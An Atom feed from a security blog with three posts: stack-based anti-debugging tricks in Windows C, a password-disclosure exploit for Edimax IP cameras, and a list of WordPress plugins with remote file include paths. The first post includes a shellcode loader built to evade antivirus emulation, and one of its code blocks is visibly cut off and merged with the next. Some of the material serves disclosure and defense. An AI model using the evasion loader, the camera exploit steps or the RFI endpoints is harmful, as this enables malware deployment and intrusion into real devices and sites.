<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom"><title>Spare Clock Cycles</title><link href="https://spareclockcycles.org/" rel="alternate"></link><link href="https://spareclockcycles.org/feeds/all.atom.xml" rel="self"></link><id>https://spareclockcycles.org/</id><updated>2012-02-14T06:23:00-05:00</updated><entry><title>Stack Necromancy: Defeating Debuggers By Raising the Dead</title><link href="https://spareclockcycles.org/2012/02/14/stack-necromancy-defeating-debuggers-by-raising-the-dead.html" rel="alternate"></link><updated>2012-02-14T06:23:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2012-02-14:2012/02/14/stack-necromancy-defeating-debuggers-by-raising-the-dead.html</id><summary type="html">&lt;p&gt;This article presupposes a basic understanding of how function calls and
stacks work. If you'd like to learn or need a refresher, Wikipedia is
always a &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Call_stack"&gt;good place to start&lt;/a&gt;.&lt;/p&gt;
&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Referencing uninitialized memory is a fairly common programming mistake
that can cause a variety of seemingly bizarre behaviors in otherwise
correct code. For the uninitiated, &amp;nbsp;take a look at&amp;nbsp;&lt;a class="reference external" href="https://www.securecoding.cert.org/confluence/display/seccode/EXP33-C.+Do+not+reference+uninitialized+memory"&gt;CERT's secure
coding guide&lt;/a&gt;&amp;nbsp;for more info. Summarized, the core problem is that one
might reuse memory that has already been touched by the application.
Because that memory is not cleared automatically for performance
reasons, it must be explicitly set to an expected value or one risks
introducing unexpected behavior. Uninitialized memory references often
go unnoticed, as the code will work just fine if the uninitialized
memory doesn't contain an unfortunate value.&lt;/p&gt;
&lt;p&gt;Interesting, but what does this have to do with detecting debuggers?
Well, contrary to what many think, the value stored at a given
uninitialized address can actually be quite predictable, especially when
it comes to stack data. This is because the stack normally contains data
that was used in previous function calls. If the same series of
functions get called prior to a given function getting control, many of
the values stored on the dead stack will be&amp;nbsp;identical&amp;nbsp;between runs. What
this means is that if a debugger makes any changes whatsoever to a given
process's dead stack space by making any extra function calls before our
detection function gets run, an application should be able to detect
differences between the normal state and the debugged state.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-dead-live-again"&gt;
&lt;h2&gt;The Dead Live Again&lt;/h2&gt;
&lt;p&gt;Surely Windows wouldn't alter the stack when it's debugging a
process...this could cause unanticipated behavior, especially when
trying to debug uninitialized memory references! However, it appears
that the Windows debugging API does just that. The following is a
simplified version of the code I was writing when I first stumbled onto
this issue:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;windows.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;quot;tlhelp32.h&amp;quot;
void dbgchk(){
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,0);
    //Comment out res=-1 for less magic
    DWORD res = -1;
    if(!hSnapshot)
        printf(&amp;quot;Something bad happened&amp;quot;);
    MODULEENTRY32 mod;
    if(!Module32First(hSnapshot,&amp;amp;mod)) {
        printf(&amp;quot;Debugger detected!&amp;quot;);
        return;
     }
     CloseHandle(hSnapshot);
     printf(&amp;quot;Not a debugger!&amp;quot;);
}

int main(){
    dbgchk();
    return 0;
}
&lt;/pre&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/snapdetect.tar.bz2"&gt;Code and executable&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When compiled using MinGW32 4.5.4 and run on Windows 7 32/64 bit, this
code should correctly detect the presence of a debugger.&lt;/p&gt;
&lt;p&gt;Let's look into what exactly is happening here. Upon first glance, it
may not appear that anything is too overtly wrong (besides the
uninitialized mod variable), and certainly nothing that seems like it
should detect the presence of a debugger. One might be tempted to think
that the API calls are trying to use some system functionality that
behaves differently when debugged, a technique that is already often
used in anti-reverse engineering. However, inspection in Olly reveals
that this is not the case. Something more subtle is happening here.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2012/02/kernel32_module32first_debugged.png"&gt;&lt;img alt="Ollydbg in Mod32First call" src="https://spareclockcycles.org/wp-content/uploads/2012/02/kernel32_module32first_debugged.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As you can see, when we first enter the Module32First function, checks
are performed on the mod variable, including one that checks the stack
address 0x0022fc84 (which points to dwSize of the MODULEENTRY32 struct
passed in) to see if it's greater than 0x243, the size of a
MODULEENTRY32 structure. If this check fails, the function returns an
error immediately. From the above stack state, this location is set to
0, and we know the check will fail. Because the check passes when we run
it without a debugger, we can assume that there must be a different
value stored at this address during normal operation. An appropriately
placed printf reveals that there is a stack address, 0x0022fd60, in
place of the 0 when run without the debugger, causing the function to
proceed as normal.&lt;/p&gt;
&lt;p&gt;I mentioned earlier that the state of the dead stack is dependent on the
functions that have run previously. This helps to explain why the stack
would be different when debugged vs not. &amp;nbsp;Most (all?) debuggers on
Windows make extensive use of &amp;nbsp;the debugging API during their normal
operation, given how easy it is to use and how much power it provides.
The debugger can attach to a process in two ways: it can attach at
process startup by passing the correct flags to CreateProcess, or it can
call DebugActiveProcess to attach to one that is already running. When
you open an executable directly in one of these debuggers, it will use
the CreateProcess method, and wait for a CREATE_PROCESS_DEBUG_EVENT
to occur. During this time, Windows calls all the necessary functions to
instantiate the process, and this includes setting up the necessary
debugging objects in the process space. Because of this, Windows behaves
differently when loading a debugged process than when it's not, and this
means (you guessed it!) different function calls, and different dead
stack values.&lt;/p&gt;
&lt;p&gt;Already, this looks like rather interesting anti-debugging technique. I
haven't been able to find any previous description of this technique,
but it's entirely possible my Google-fu is just weak. I refer to it as
stack necromancy, given that it centers around the manipulation of
previously dead stack values. Defeating it automatically seems to
require foreknowledge of how exactly how the dead stack should look to
an application, which is certainly a higher bar than, say, setting the
IsDebugged flag in the PEB to 0. If one can align the stack properly to
fail when making certain API calls while being debugged, but pass when
not, one can easily create some rather cryptic checks for the presence
of a debugger. Any API call that fails when certain values are passed to
it could potentially be used to trigger the detection.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="improving-our-spells"&gt;
&lt;h2&gt;Improving Our Spells&lt;/h2&gt;
&lt;p&gt;Now that we know that we can detect the presence of a debugger, and it
seems we can do so trivially inside any number of API calls: what next?
A reverse engineer can just nop out the check once he finds where it is,
and, although it's more subtle than many checks, a dedicated person
would track it down. It would be nice if we could also make the entire
operation of an executable dependent on the differences in the stack.
There are two obvious ways to do this: use the previously shown tricks
to cause a large number of necessary API calls to fail during debugging
(for instance, by abusing LoadLibrary), or use values pulled off the
stack to encrypt various necessary values. Thankfully for us, the dead
stack is actually relatively stable, so we can do both of these. Both of
these examples are still relatively easy to patch, but serve to show the
kinds of things one might do.&lt;/p&gt;
&lt;p&gt;Here's an example of some stack necromancy using the LoadLibrary API
call, a rather straightforward function applications often call during
normal execution that would cause the application to fail if the call
failed:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;windows.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;

void dbgchk7(){
    char res[298];
    char lib[12] = &amp;quot;kernel32.dll&amp;quot;;
    if(LoadLibrary(lib)){
        printf(&amp;quot;Win 7: Not debugged!\n&amp;quot;);
        return;
    }
    printf(&amp;quot;Win 7: Debugged!\n&amp;quot;);
}

void dbgchkxp(){
    char res[53];
    char lib[12] = &amp;quot;kernel32.dll&amp;quot;;
    if(LoadLibrary(lib)){
        printf(&amp;quot;XP: Not debugged!\n&amp;quot;);
        return;
    }
    printf(&amp;quot;XP: Debugged!\n&amp;quot;);
}

BOOL chkxp(){
    UINT *ptr = (UINT *)((((UINT)&amp;amp;ptr) &amp;amp; 0x00FF0000)|0xfe0c);
    return ((*ptr)&amp;amp;0xff)==0x00;
}

int main(){
    //Detect OS first to avoid mangling dead stack
    if(chkxp())
        dbgchkxp();
    else
        dbgchk7();
    return 0;
}
&lt;/pre&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/loadlibrary_detect.tar.bz2"&gt;Code and
executable&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Take a minute to look at the above code. Once again, nothing about the
actual detection code seems like it should be able to tell whether an
application is being debugged or not. This code sample does, in fact,
exploit the same issue, but does it in a slightly different way. &amp;nbsp;Rather
than making a length field fail a certain check, this code works by
omitting the null terminator for the string containing the module to be
loaded. This means the LoadLibrary call will fail or succeed depending
on the character immediately following the lib array. &amp;nbsp;By placing the
array in a position on the stack that will have a different value stored
immediately after the string (null or otherwise), we can get the call to
behave differently when being debugged.&lt;/p&gt;
&lt;p&gt;To get this to work on both XP and Windows 7, &amp;nbsp;I had to do two main
things: first, detect the OS without screwing up the stack, and second,
push the lib array to an appropriate place by adding local variables to
our chosen function. The OS detection is not strictly necessary in this
case, but it made my life easier, as the first LoadLibrary call will
significantly change the stack, making appropriate values more difficult
to find, and finding a single offset that works on both is a bit
frustrating. Normally, OS detection would be done through a Windows API
call, but we again want to have as small of a footprint as possible to
avoid messing up our stack. &amp;nbsp;Instead, we can do it with the same
technique we're using to detect debugger presence, by simply grabbing a
chosen value off of the stack and checking if it matches an expected
value.&lt;/p&gt;
&lt;p&gt;The offsets used here were rather arbitrarily chosen, largely by
glancing over dumps of the stack state at the desired time while
debugged vs not. I have yet to come up with a good way to automate that
process, beyond a few stupid bits of code to print out portions of
the&amp;nbsp;uninitialized&amp;nbsp;stack. I have found that places higher up (lower
addresses) in the dead stack are more likely to be different, probably
because they are largely left over from process setup and are less
likely to have been overwritten by identical calls. However, the values
lower in the dead stack seem to be more stable, so there's a tradeoff
there. The nice thing about the approach is that there's no shortage of
possible values to choose from; you're bound to find suitable values for
what you want to do.&lt;/p&gt;
&lt;p&gt;Here is an example of using stack necromancy to pull encryption values
out of the stack graveyard, which causes the application to fail if it
is being debugged:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;windows.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;

UCHAR msg[] = &amp;quot;\x06\x30\x2b\x2c\x29\x62\x2f\x2d\x30\x27\x62\x2d\x34\x23\x2e\x36\x2b\x2c\x27\x6c&amp;quot;;
void print_results(UCHAR key){
    int i;
    for(i=0;i&amp;lt;20;i++)
       msg[i] = msg[i] ^ key;
    printf(msg);
    printf(&amp;quot;\n\nWritten by supernothing, level 90 necromancer.\n&amp;quot;);

}

void decodemessage(){
    //Get base address
    UINT *ptr = (UINT *)((((UINT)&amp;amp;ptr) &amp;amp; 0x00FF0000)|0xfe0c);
    if(((*ptr)&amp;amp;0xff)==0x00){
        //WinXP 32bit
        ptr = (UINT *)((((UINT)&amp;amp;ptr) &amp;amp; 0x00FF0000)|0xfdc8);
        print_results(((((*ptr)&amp;amp;0xff0000)&amp;gt;&amp;gt;16)^0x83));
    } else {
        //Win7 32 bit and 64 bit
        ptr = (UINT *)((((UINT)&amp;amp;ptr) &amp;amp; 0x00FF0000)|0xfdd0);
        print_results(((*ptr)&amp;amp;0xff)^0xb6);
    }
}

int main(){
    decodemessage();
    return 0;
}
&lt;/pre&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/ovaltine.tar.bz2"&gt;Code and
executable&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;While this is a somewhat simple example (I doubt a single byte XOR key
is going to worry anyone), it serves to show that it is possible to
resurrect dead stack values and use them as encryption keys. This code
was tested on 32 bit Win XP and 32/64 bit Win 7 and will work correctly
when run normally, but will fail miserably when run in a debugger. In
this example, I simply find which system I'm running on and map the
appropriate byte to the correct key via an XOR. This one uses the same
hardcoded offset OS version check offset (0xfe0c) as our previous
example for convenience. It then pulls the appropriate value from known
stable addresses and uses it as a key. This same sort of code could
easily be used to generate a much larger key and be used with a decent
crypto algorithm.&lt;/p&gt;
&lt;p&gt;This technique is not only useful when it comes to debuggers, however:
it is arguably even more useful in defeating the dynamic code emulation
used by antivirus applications to try and detect packed code. AV
applications also make telltale changes to the stack space, which can
allow an attacker to prevent their code from being dynamically unpacked
in one of these environments. In a previous post, I talked about
&lt;a class="reference external" href="https://spareclockcycles.org/2010/11/27/avoiding-av-detection/"&gt;writing a simple crypter&lt;/a&gt;to bypass AV. In it, I used a timing attack
to defeat emulation. We can see from these VirusTotal results that
simply by using the same stack necromancy we used above, we can achieve
similar results: &lt;a class="reference external" href="https://www.virustotal.com/file/9ba6b7607efabc32e391e797df2cacd84a423049324d4af486dd84ed7e6503e4/analysis/1329216499/"&gt;without emulation defeat&lt;/a&gt; / &lt;a class="reference external" href="https://www.virustotal.com/file/c4b880d069be6107bde5b90ad3f781f7af7a562e311c4910b700af12d79f4d8a/analysis/1329216561/"&gt;with emulation defeat&lt;/a&gt;.
The detection by CAT-QuickHeal is based on a generic unpacking signature
which appears to center around large buffers being XORed, as it still
throws a detection when the shellcode is non-functional.&lt;/p&gt;
&lt;p&gt;Without defeat&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;windows.h&amp;gt;
UCHAR sc[] = YOUR_SHELLCODE_HERE;

UCHAR key;

int main(){
    key = 0x42;
    int SC_LEN = 2477;
    int i;
    UCHAR* tmp = (unsigned char*)malloc(SC_LEN);

    for(i=0; i
With defeat
#include &amp;lt;windows.h&amp;gt;
UCHAR sc[] = YOUR_SHELLCODE_HERE;

UCHAR key;

void getdecodeinfo(){
    //Get base address
    UINT ptr = (((unsigned int)&amp;amp;ptr)&amp;amp;0x00FF0000)+0xfb1c;
    if(((*(unsigned int*)ptr)&amp;amp;0xff)==0x24){
        //WinXP 32bit
        key = ((((*(unsigned int*)ptr)&amp;amp;0xff00)&amp;gt;&amp;gt;8)^0x4e);
    } else {
        //Win7 32 bit and 64 bit
        key = ((*(unsigned int*)ptr)&amp;amp;0xff)^0x4a;
    }
}

int main(){
    getdecodeinfo();
    int SC_LEN = 2477;
    int i;
    UCHAR* tmp = (unsigned char*)malloc(SC_LEN);

    for(i=0; i&amp;lt;SC_LEN; i++){
        tmp[i]=sc[i]^key;
    }

    ((void (*)())tmp)();

    return 0;
}
&lt;/pre&gt;
&lt;p&gt;This particular class of defeats is extra nice however, as they can't be
optimized out like many time-based ones, but are still quite generic and
hard to detect with signatures. After all, many applications
inadvertently reference uninitialized memory. Triggering on that alone
could significantly increase false positives.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="machetes-are-your-friend"&gt;
&lt;h2&gt;Machetes Are Your Friend&lt;/h2&gt;
&lt;p&gt;Bypassing the techniques I've presented here is by no means impossible,
but they are an obstacle to reverse engineering. Because of the
generality of the technique, and the large number of ways to use it, a
&amp;quot;general&amp;quot; defeat would take some effort to develop. The best strategy I
have come up with so far is creating the process in a suspended state
without debugging it, dumping the stack state, re-running the
application in a debugged state, and writing the expected dead stack
into the process. Something along these lines *should* work, but I
have not tested any of it.&lt;/p&gt;
&lt;p&gt;Defeating single implementations, however, is definitely doable. The
main challenge, as alluded to above, is finding where the detection
happened. Malware is not going to be as kind to the reverse engineer as
my examples are. A sample very well might detect the debugger during
application startup, and then continue on its merry way until some point
in the future. Because of how subtle the check can be, and how many
different ways it could be used, it could be difficult to find the
offending memory accesses. Carefully inspecting each function for
accesses to uninitialized memory is probably too tedious / not feasible,
so automation in the form of memory analysis tools is likely a must.
There's a number of these tools for Windows, and most of them would
probably work. Once the check is found, it can be patched like most
other debug defeats. The exceptions are going to be examples that pull
values from the stack rather than just checking them. These will require
modifying the binary to print the value, and then running the code
without a debugger.&lt;/p&gt;
&lt;p&gt;The biggest concern for those performing stack necromancy is that
Microsoft or an AV company will intentionally attempt to mangle the call
sequence executed during application startup. This would be the obvious
response in my mind to prevent malicious software from using it. If this
happened, it would obviously render the application inoperative. For
this reason, it may make sense to fail more gracefully here than with
other techniques, falling back to an update mechanism of some kind to
receive a fix.&lt;/p&gt;
&lt;p&gt;As for defending against this technique in an AV's emulator, the only
real way I can see is to perfectly simulate the runtime environment of
the given process, down to the state of the empty stack. Unless you're
doing that, these kinds of defeats should always work. However, I would
love to see myself proved wrong.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="enough-for-today"&gt;
&lt;h2&gt;Enough For Today&lt;/h2&gt;
&lt;p&gt;Sadly, that's about all I have on the wonderful world of dead stacks for
this post. Due to the nature of the code that I've posted above, it
obviously may not work on your particular system. I've been pretty
thorough about testing it on various VMs and computers I have laying
around, but that definitely doesn't preclude it breaking elsewhere. I've
already identified a few things that can cause it to fail, namely
certain intrusive AV techniques such as DLL injection, as well as
differing OS versions. However, anything that affects the state of the
stack prior to the application's main being reached could potentially
disrupt it. If it's not working for you, feel free to let me know about
it (preferably with suggestions as to why it fails and/or cleverly
worded insults about my puny human brain).&lt;/p&gt;
&lt;p&gt;Hopefully, I have been able to demonstrate some of the very interesting
things that can be done by resurrecting dead stack values and using them
to do one's bidding. There are doubtless many more ways that people
could improve upon the techniques I have discussed here, and I look
forward to hearing about them. Happy hacking.&lt;/p&gt;
&lt;/div&gt;
</summary></entry><entry><title>Exploiting an IP Camera Control Protocol: Redux</title><link href="https://spareclockcycles.org/2012/01/23/exploiting-an-ip-camera-control-protocol-redux.html" rel="alternate"></link><updated>2012-01-23T16:59:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2012-01-23:2012/01/23/exploiting-an-ip-camera-control-protocol-redux.html</id><summary type="html">&lt;p&gt;Last May, &lt;a class="reference external" href="https://spareclockcycles.org/2011/05/23/exploiting-an-ip-camera-control-protocol/"&gt;I wrote&lt;/a&gt; about a remote password disclosure vulnerability I
found in a proprietary protocol used to control ~150 different low-end
IP cameras. The exploit I wrote was tested on the &lt;a class="reference external" href="http://www.rosewill.com/products/1728/productDetail.htm"&gt;Rosewill RXS-3211&lt;/a&gt;,
a rebranded version of the &lt;a class="reference external" href="http://www.edimax.com/en/produce_detail.php?pd_id=352&amp;amp;pl1_id=8&amp;amp;pl2_id=91"&gt;Edimax IC3005&lt;/a&gt;. &amp;nbsp;The vulnerability remained
unpatched in the RXS-3211 until July of last year, when a supposed fix
was provided . Unfortunately, I've been busy working on other projects,
so I just recently got around to testing it. Spoiler: the results
weren't good. The following post documents how easy it is to still
exploit this particular vulnerability, alternative ways to exploit the
protocol, and how to create your own firmware images to run whatever you
want on devices that you now control.&lt;/p&gt;
&lt;div class="section" id="the-patch-is-0-1-effective"&gt;
&lt;h2&gt;The Patch Is 0.1% Effective&lt;/h2&gt;
&lt;p&gt;After flashing the latest firmware image to one of my cameras and
installing the new management application, I did exactly what I did the
first time: fired up Wireshark again and looked through the traffic. It
was clear from the dumps that they were at least obfuscating the traffic
now, but the sad fact remained that when I entered my password into the
client application, no traffic was sent to the server before I was
granted access. Clearly, &amp;nbsp;authentication in the protocol is still
occurring client-side. Not good.&lt;/p&gt;
&lt;p&gt;With that knowledge, I thought it'd be fun to first explore what all one
can do without even having the admin password. Thankfully, this was much
easier than would be expected, given my fateful acquisition of Edimax's
implementation of the protocol. While working on creating custom
firmware images, I downloaded a number of GPL source packages released
by Edimax. In the IC3010 package, I realized that Edimax had included
more source code than normal, including one folder labeled
&amp;quot;enet_EDIMAX&amp;quot;. After a quick look, I realized I now had the source to
the protocol I had been reversing. Win.&lt;/p&gt;
&lt;p&gt;Rather than describing what one can do while unauthenticated, it would
probably be faster to describe what one *can't* do. Reboots, factory
resets, reading any and all device settings, performing WLAN surveys,
toggling LEDs...it is even possible to perform remote, unauthenticated
firmware flashing on some models. &amp;nbsp;Basically the only thing that isn't
possible to do is grabbing remote frames from the camera. You can read
through the code for yourself here: &amp;nbsp;&lt;a class="reference external" href="http://pastebin.com/gALqkg8h"&gt;enet_agentd.h&lt;/a&gt;
&lt;a class="reference external" href="http://pastebin.com/Bb3bWZP5"&gt;enet_agentd.c&lt;/a&gt;. After some quick Python scripting, I confirmed that
all of the supported functions on the RXS-3211 were still vulnerable to
exploitation, even if the admin password was no longer in cleartext. If
anyone reading has one of the cameras that supports wireless or firmware
flashing (IC-1000, maybe others), I'd love to see if the other enet
functionality works.&lt;/p&gt;
&lt;p&gt;Obviously, the patch wasn't very effective. However, for the sake
of&amp;nbsp;curiosity&amp;nbsp;and thoroughness, I wanted to see if it was still possible
to recover the admin password. To do so meant figuring out how the
traffic was being encoded. and if it could be defeated . The header
format I described in my previous post was still intact, but the body
was obviously scrambled somehow.&amp;nbsp;While this could have required a
serious reverse engineering effort, it turned out to be fairly simple.&lt;/p&gt;
&lt;p&gt;In such situations, there's only a few options: encryption, compression,
or both. After changing the password on the device &amp;nbsp;a few times and
observing how the traffic changed, it became obvious that either very
weak encryption was being used or the data was compressed, as there was
an easily&amp;nbsp;discernible&amp;nbsp;pattern between the input text and the output.
Comparing the passwords &amp;quot;1111111111&amp;quot; and &amp;quot;1234567890&amp;quot;, it became clear
that compression was the winner: the length of packets with the former
password were a few bytes shorter than the latter. Compression
algorithms often work by shrinking 'runs' of data in some way, and
hence, will compress the same character in succession much more
efficiently than different ones. To find out which algorithm, I then
went back and ran strings on the management executable, which gave me my
answer: zlib compression. Yes...their solution to remote password
disclosure was to compress the password before sending it. Brilliant.
After this, all it took was a single line of Python to make things work
perfectly again:&amp;nbsp;zlib.decompress(data[12:-4],-15).&lt;/p&gt;
&lt;p&gt;To demonstrate these vulnerabilities, I threw together a simple Python
script: &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/enet_pwn.py"&gt;enet_pwn.py&lt;/a&gt;. With this, an attacker can disclose the admin
password and others stored on all devices using the enet protocol
(including the &amp;quot;patched&amp;quot; RXS-3211), &amp;nbsp;grab many of the common settings
shared between devices, and perform reboots and factory resets on the
cameras. Obligatory disclaimer: I am not responsible for any illegal use
of this tool.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="going-further"&gt;
&lt;h2&gt;Going Further&lt;/h2&gt;
&lt;p&gt;For all the vulnerabilities I've pointed out in their software, I still
really like the Edimax cameras for their low cost and high
&amp;quot;hackability&amp;quot;. Creating firmware images for the devices can allow you do
some cool things other cameras can't, and for ~30 dollars for the low
end ones, it's a pretty good deal. In fact, the first time I bought one,
I had actually considered turning it into a poor man's pentesting drop
box (which it does quite well). However, because of how easy it is to
create firmware images for the cameras, attackers can also install
anything they like once getting the admin password. This could allow
them to gain further unauthorized access to a network.&lt;/p&gt;
&lt;p&gt;While creating custom firmware for these cameras is a little more
complicated than simply using the &lt;a class="reference external" href="https://code.google.com/p/firmware-mod-kit/"&gt;firmware mod kit&lt;/a&gt;, it isn't by much.
I've created a &lt;a class="reference external" href="https://code.google.com/p/edimax-ipcam-fw/source/checkout"&gt;few basic scripts that handle everything&lt;/a&gt;, which
basically just automate the process &lt;a class="reference external" href="http://www.suborbital.org.uk/canofworms/index.php?/archives/3-Getting-telnet-access-on-an-Edimax-IC3010-webcam.html"&gt;described here&lt;/a&gt;. All someone needs
to do is use the extract_edimax.sh script to extract the image, modify
the root filesystem to their liking, and then recompile with the
build_edimax.sh script. Edimax provides a toolchain for compiling your
own applications, which can also be found in my repository in the tools
directory. For me, getting netcat on there was enough for everything I
wanted. I should note though that any flashing you do could damage your
device, so be careful. It is usually possible to recover through a
serial terminal on the device, but it's usually best to avoid that
annoyance.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="mitigation"&gt;
&lt;h2&gt;Mitigation&lt;/h2&gt;
&lt;p&gt;For end users, the easiest thing to do is simply to block incoming UDP
packets on port 13364. It's possible to make your own firmware image
that isn't vulnerable, but this is left as an exercise for the reader
(or possibly a later post).&lt;/p&gt;
&lt;p&gt;For the developers, here is, once again, some possible pseudocode for
the server:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
if discovery request:
    allow
else if any other valid request encrypted with admin password hash:
    allow
else:
    deny deny deny
&lt;/pre&gt;
&lt;p&gt;Never send cleartext passwords. Don't even send hashes unless you have
to. And definitely don't send them to clients. It's not that
complicated. If you can't do that much, you shouldn't be rolling your
own protocols.&lt;/p&gt;
&lt;/div&gt;
</summary></entry><entry><title>Explo(it|r)ing the Wordpress Extension Repos</title><link href="https://spareclockcycles.org/2011/09/18/exploitring-the-wordpress-extension-repos.html" rel="alternate"></link><updated>2011-09-18T01:03:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-09-18:2011/09/18/exploitring-the-wordpress-extension-repos.html</id><summary type="html">&lt;p&gt;Today's post is kind of long, so I thought I should warn you in advance
by adding an additional paragraph for you to read. I also wanted to
provide download links for those who'd rather just read the code. It
isn't the cleanest code in the world, so I apologize in advance. I
discuss what all of these are for and how they work later on in the
post, so if you're confused and/or curious, read on. Downloads:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Copies of the Wordpress theme and plugin repositories can be grabbed
via &lt;a class="reference external" href="https://spareclockcycles.org/downloads/wordpress_repos.torrent"&gt;torrent&lt;/a&gt; (Please note that the plugin repo has a few
directories incomplete/missing; this can be fixed by running my
checkout code)&lt;/li&gt;
&lt;li&gt;A new Wordpress plugin fingerprinting tool, &lt;a class="reference external" href="http://code.google.com/p/wpfinger/"&gt;wpfinger&lt;/a&gt;
(&lt;a class="reference external" href="http://code.google.com/p/wpfinger/downloads/detail?name=wpfinger-v0.1.1.tar.bz2"&gt;download&lt;/a&gt;). This tool can infer detailed version information on
just about every plugin in the Wordpress repository. This package
also contains some useful libraries for checking out the repositories
and scraping plugin rankings, as this is used in the fingerprinting
tool.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="section" id="intro"&gt;
&lt;h2&gt;Intro&lt;/h2&gt;
&lt;p&gt;After finding an &lt;a class="reference external" href="https://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/"&gt;arbitrary file upload vulnerability in 1 Flash
Gallery&lt;/a&gt;, I became curious as to how many other Wordpress plugins made
basic security mistakes. The 1 Flash Gallery plugin issue, it seems, is
that they CTRL-C-V'd code from a project called &lt;a class="reference external" href="http://www.uploadify.com/"&gt;Uploadify&lt;/a&gt;, which has
been known to be vulnerable &lt;a class="reference external" href="http://osvdb.org/62653"&gt;for quite awhile&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;After realizing this, I became curious as to how many plugins make
easy-to-spot security mistakes, such as reusing vulnerable libraries or
doing such things as include($_REQUEST['lulz']). However,
my&amp;nbsp;curiosity&amp;nbsp;was initially somewhat hampered by the fact that
downloading and auditing every Wordpress plugin one at a time is not
only a mind numbing task, but a herculean one as well. And, well, I'm
incredibly lazy.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="getting-the-repos"&gt;
&lt;h2&gt;Getting the Repos&lt;/h2&gt;
&lt;p&gt;So what to do? Well, it turns out that Wordpress is nice enough to have
public repositories (&lt;a class="reference external" href="http://plugins.svn.wordpress.org"&gt;http://plugins.svn.wordpress.org&lt;/a&gt; and
&lt;a class="reference external" href="http://themes.svn.wordpress.org"&gt;http://themes.svn.wordpress.org&lt;/a&gt;) containing all plugins that have ever
been submitted, as well as every theme. &amp;nbsp;This, of course, was exciting:
I could just check this out, whip out some grep-fu, and have my answers.&lt;/p&gt;
&lt;p&gt;Alright, so maybe it isn't as simple as that. First, the plugin repo is
huge: as is, it's taking up a good 80GB on one of my disks and contains
approximately 12,000,000 files, thanks in no small part to subversion's
insistence on creating ridiculous numbers of internal files. This isn't
all that suprising, however, given that the repo contains ~23,000
plugins.&lt;/p&gt;
&lt;p&gt;As I found out in my initial failed attempts to grab the code, checking
this out all at once with subversion is, as far as I can tell,
impossible. After about 15-20 minutes of downloading, the checkout would
error out, and I'd have to wait for SVN to reverify everything it had
already gotten. This got old quickly, so I came up with a hacked
workaround: I wrote a quick script that simply checked out the
individual repositories for every plugin and theme. Not very clean, but
for my purposes, effective. A little over a day later, I had all the
themes and plugins, and it was time for some fun.&lt;/p&gt;
&lt;p&gt;A side note: for those of you who would like to play with either of
these, I'd recommend &lt;a class="reference external" href="https://spareclockcycles.org/downloads/wordpress_repos.torrent"&gt;grabbing the torrent&lt;/a&gt;, extracting it, and then
running my checkout script in wpfinger in the directory above them. This
will still get you the latest versions of all the plugins, but should
take significantly less time and put less strain on everyone's servers.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="attack"&gt;
&lt;h2&gt;Attack&lt;/h2&gt;
&lt;p&gt;Anyway, on to the vulnerabilities. During my scans I found remote
unauthenticated code execution vulnerabilities in 36 plugins, varying in
popularity from ~250 downloads to ~60,000. Finding them took essentially
no effort or skill on my part, just patience.&lt;/p&gt;
&lt;p&gt;The following eleven plugins were found entirely with grep and a little
bit of manual inspection. Instead of running over every PHP file in the
repo, I sped things up by only running over code in the trunk
directories. This was under the assumption that that should be the
latest code. Pretty much all of these were found analyzing results from
the same grep:&lt;/p&gt;
&lt;p&gt;Grep used: egrep -i
'(include|require)(_once)?(\(|\s+)[^[;)]*\$_(REQUEST|GET|POST|COOKIE)'&lt;/p&gt;
&lt;p&gt;Base is &lt;a class="reference external" href="http://host/wp-content/plugins/PLUGIN_NAME/"&gt;http://host/wp-content/plugins/PLUGIN_NAME/&lt;/a&gt; unless explicitly
stated.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Remote File Include - unauthenticated&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;----------------------------------------------------------&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;zingiri-web-shop = /fws/ajax/init.inc.php?wpabspath=RFI OR
/fwkfor/ajax/init.inc.php?wpabspath=RFI&lt;/li&gt;
&lt;li&gt;mini-mail-dashboard-widget = wp-mini-mail.php?abspath=RFI (requires
POSTing a file with ID wpmm-upload for this to work)&lt;/li&gt;
&lt;li&gt;mailz = /lists/config/config.php?wpabspath=RFI&lt;/li&gt;
